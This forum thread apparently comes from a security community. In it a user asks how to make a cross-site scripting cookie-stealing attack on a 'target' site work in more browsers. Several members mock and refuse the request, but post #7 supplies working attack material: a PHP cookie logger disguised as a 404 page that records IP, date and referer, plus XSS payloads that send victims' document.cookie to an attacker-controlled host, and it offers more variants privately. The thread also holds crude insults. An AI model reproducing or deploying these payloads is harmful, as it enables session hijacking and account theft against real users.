Cookie
Results 1 to 8 of 8

Thread: Cookie

  1. #1

    Cookie

    Okay this is what I have on my targets site.

    Code:
    <script>
    document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;
    </script>
    And this is what is on my server.

    Code:
    Code:
    <?php
    $cookie = $_GET['cookie'];
    $log = fopen("log.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>

    For some reason this only works on Opera any ideas on how I can this compatible with IE and FF?
    Share on Google+

  2. #2
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    try sending an email to abuse@WhateverYourISP.net is or .com whatever it may be and ask them, most of them are bored with most "How do I haxxor Hotmail" reqwuests but you've put work into yours so they may help you out more. Make sure to include your real name so they can look you up to validate you as a customer.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux
    Share on Google+

  3. #3
    **** you buddy. I just don't know much about JS or PHP just needed some help I can clearly so you can't help.
    Share on Google+

  4. #4
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    I already helped you, I said to email them and have them hook you up. If you don't like my answer maybe you should try asking a question that isn't making you appear stupid.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux
    Share on Google+

  5. #5
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    765
    **** you buddy. I just don't know much about JS or PHP just needed some help I can clearly so you can't help.
    Thats not cool.

    This question looks very similar to

    http://elitehackers.info/forums/showthread.php?t=5772

    Share on Google+

  6. #6
    Senior Member
    Join Date
    Dec 2003
    Location
    Pacific Northwest
    Posts
    1,675
    Originally posted here by phyburn
    **** you buddy. I just don't know much about JS or PHP just needed some help I can clearly so you can't help.

    He might thank you for the offer however even if you were to dress up like a hooker on payday, I doubt that he’d do you. What kind of response did you think you would receive when you ask us to help you be an ass? Obviously you don’t need our assistance. You’ve succeeded!

    cheers
    Connection refused, try again later.
    Share on Google+

  7. #7
    Banned
    Join Date
    Jul 2006
    Location
    /
    Posts
    385
    save it as cookie.php
    Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>error-404</title>
    </head>
    
    <body>
    <?
    $logfile = 'log.txt';
    $cookie = $_GET['c'];
    $ip = getenv ('REMOTE_ADDR');
    $date=date("j F, Y, g:i a");
    $referer=getenv ('HTTP_REFERER');
    
    if ($cookie!='') {
     $fp = fopen($logfile, 'a');
      fwrite($fp, "Cookie: ".$cookie."\nIP: " .$ip. "\nDate and Time: " .$date. "\nReferer: ".$referer."\n-------------------------------------------------------------------\n");
        }
    ?>
    </body>
    </html>
    or you could even use this:

    Code:
    <a
    href=”http://www.example.com/index.php?page=<script>document.location.replace('http://www.mysite.com/log.php?c=' +document.cookie);</script>”
    nomouseover=”window.status='http://www.example.com/login.php'; return true”
    onmouseout=”window.status=''; return true”
    >Login page</a>
    then create a blank .txt file called log.txt chmod it to 666...
    put that in the same directory as the cookie.php

    this is the url that you use to get the cookie sessions from the victim.
    Code:
    &lt;a http://puttargersiteaddressehere.com&lt;script&gt;document.location='http://your-site-goes-here.com/cookie.php?c='+document.cookie&lt;/script&gt;
    i do have other variations that can be used. but it would not be appropriate to upload the .zip here.

    shoot me a pm..
    Share on Google+

  8. #8
    They call me the Hunted foxyloxley's Avatar
    Join Date
    Nov 2003
    Location
    3rd Rock from Sun
    Posts
    2,528
    over a year here
    and THIS is the best you can come up with

    what a complete waste of electrons
    55 - I'm fiftyfeckinfive and STILL no wiser,
    OLDER yes
    Beware of Geeks bearing GIF's
    come and waste the day :P at The Taz Zone
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides